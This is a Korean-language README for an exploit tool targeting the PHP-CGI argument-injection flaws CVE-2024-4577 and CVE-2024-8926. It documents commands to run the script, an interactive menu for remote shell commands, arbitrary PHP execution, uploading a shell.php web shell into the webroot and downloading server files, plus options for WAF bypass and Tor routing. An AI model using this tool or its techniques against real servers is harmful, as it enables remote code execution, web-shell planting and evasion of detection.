
CVE-2024-4577과 CVE-2024-8926을 테스트하는 보안 침투 도구
🚀 CVE-2024-4577 및 CVE-2024-8926 익스플로잇 도구
PHP-CGI 매개변수 주입 취약점을 대상으로 하는 자동화 테스트 도구로, CVE-2024-4577 및 CVE-2024-8926을 지원하며 명령 실행, 파일 업로드, 다운로드 등의 작업을 수행할 수 있습니다.
본 도구는 PHP-CGI 환경에서의 매개변수 주입 취약점을 테스트하는 데 사용할 수 있으며, 다음 기능을 제공합니다:
본 도구는 합법적인 테스트 및 학술 목적으로만 사용해야 하며, 승인되지 않은 시스템에 사용하지 마십시오!
⚠️ 불법 사용 시 법적 책임을 질 수 있습니다!
본 도구는 다음 용도로만 제공됩니다:
본 도구는 다음과 같은 Python 패키지에 의존하므로 먼저 설치하세요:
pip install -r requirements.txt
또는 수동으로 설치:
pip install requests requests-tor chardet urllib3 rich
python exploit.py -u URL [--timeout sec] [--delay sec] [--log] [--verbose] [--payload PAYLOAD] [--bypass] [--tor] [--no-effects] [--force] [--cgipoint PATHS...]
예시:
python exploit.py -u http://example.com --timeout 30 --payload 2 --log --tor --verbose
python exploit.py -u http://example.com --bypass --force
python exploit.py -u http://example.com --cgipoint /php-cgi/php-cgi.exe /cgi-bin/php
스크립트가 취약점을 찾으면 다음 메뉴가 표시됩니다:
╭──────────── Exploit 모드 메뉴 ────────────╮
│ 현재 대상: http://example.com/ │
│ 현재 주입 지점: /php-cgi/php-cgi.exe │
│ 취약점 번호: CVE-2024-4577 │
╰────────────────────────────────────────────╯
1) 🧪 Shell 모드
2) 🛠️ PHP 사용자 정의 모드
3) 📤 파일 업로드
4) 📥 파일 다운로드
5) 🎯 공격 대상 전환
6) ⚙️ 매개변수 설정
7) ❌ 프로그램 종료
>>
시스템 명령 실행:
shell> whoami
📂 출력 저장
shell> whoami --save
shell> whoami --save C:\output\whoami.txt
사용자 정의 PHP 코드 실행:
phpinfo();
EOF
📂 출력 저장
phpinfo();
EOF --save
phpinfo();
EOF --save C:\output\info.html
로컬 파일 경로: C:\test\shell.php
대상 전체 경로:
[*] 업로드 경로가 자동으로 설정되었습니다: C:/xampp/htdocs/shell.php
📂 경로 수동 지정
대상 전체 경로: C:\xampp\php\shell.php
원격 파일 경로: C:\xampp\htdocs\index.php
📂 파일 다운로드 후 download/에 저장되며, 중복되면 자동으로 번호가 추가됩니다
[*] 파일 다운로드 완료, download/index.php에 저장됨
새 대상 URL 입력: http://newtarget.com
🔹 취약점을 다시 테스트합니다
[⚙️ 익스플로잇 단계 매개변수 설정 메뉴]
1) Payload 전환 1
2) Bypass 우회 모듈 선택 안 됨
3) 대기 시간 Timeout 10 초
4) 요청 지연 Delay 0 초
5) 자동 기록 Log 꺼짐
6) 상세 모드 Verbose 꺼짐
7) 애니메이션 효과 Effects 켜짐
8) 강제 이용 Force 꺼짐
9) 저장하고 Exploit 메뉴로 돌아가기
다음 우회 전략을 제공합니다:
php://input을 다른 표현으로 교체| 매개변수 | 설명 | 예시 |
|---|
-u , --url | 대상 URL 지정 | -u http://example.com |
--timeout sec | 요청 제한 시간 설정(0은 무한) | --timeout 30 |
--log | shell 명령 자동 기록 | --log |
--payload | Payload 조합 지정 또는 사용자 정의 | --payload 2 |
--tor | Tor를 통해 요청 전송 | --tor |
--verbose | 상세 정보 표시 | --verbose |
--bypass | WAF 우회 모드 활성화 | --bypass |
--force | 강제로 익스플로잇 모드 진입 | --force |
--cgipoint PATHS | 테스트할 특정 CGI 경로 지정 | --cgipoint /path |
--delay sec | 각 요청 사이의 지연 시간(초) | --delay 1.5 |
--no-effects | 모든 애니메이션 및 지연 효과 비활성화 | --no-effects |